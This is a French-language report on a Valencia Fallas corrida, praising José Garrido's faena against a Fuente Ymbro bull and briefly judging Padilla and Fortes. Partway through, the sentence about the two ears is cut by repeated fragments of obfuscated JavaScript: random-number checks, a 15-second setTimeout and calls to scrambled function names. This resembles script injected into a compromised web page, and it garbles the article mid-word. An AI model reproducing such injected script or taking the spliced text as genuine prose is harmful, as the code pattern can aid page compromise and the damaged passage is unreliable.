JOSÉ GARRIDO DEMANDE SA PLACE

Valence. Samedi 12 mars. La relève est arrivée. Face aux figuras sont déjà confrontés Roca Rey et López Simón. Devant elles devrait aussi s’afficher José Garrido. Comme il en a fait la démonstration lors de la première corrida des Fallas. Il a montré du courage et de la maîtrise. Et un style resplendissant. Ce fut une évidence devant son premier toro de Fuente Ymbro, un manso noble qu’il toréa à la cape de belle façon et auquel il imposa une faena de muleta vibrante, avec beaucoup de domination et très intelligente. Impensable devant un toro de cet acabit. Il y eut une superbe série de superbe, conclue avec une immense passe de poitrine. Et, à tout moment, il a toréé. C’est-à-dire qu’il a exécuté les passes précises, celles qu’il a extraites au toro malgré sa bravoure réticente, une leçon de tauromachie où le public est rentré dedans en suivant, avec passion, suivant l’émouvante faena. Et comme il l’acheva d’une estocade sans puntilla, on lui demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anda avec force et très justement les deux oreilles. Son second, un manso impossible, il l’a essayé des deux côtés, il l’a combattu et l’a bien tué. Torero.

La corrida de Fuente Ymbro fut totalement mansa. Face à ses deux toros, Juan José Padilla se montra volontaire et vulgaire. Il fut renversé par son second et attrapé sans se faire blesser après lui avoir porté l’estocade. On a vu Fortes courageux mais un peu lourd devant un lot insupportable de Fuente Ymbro.

Les commentaires sont fermés.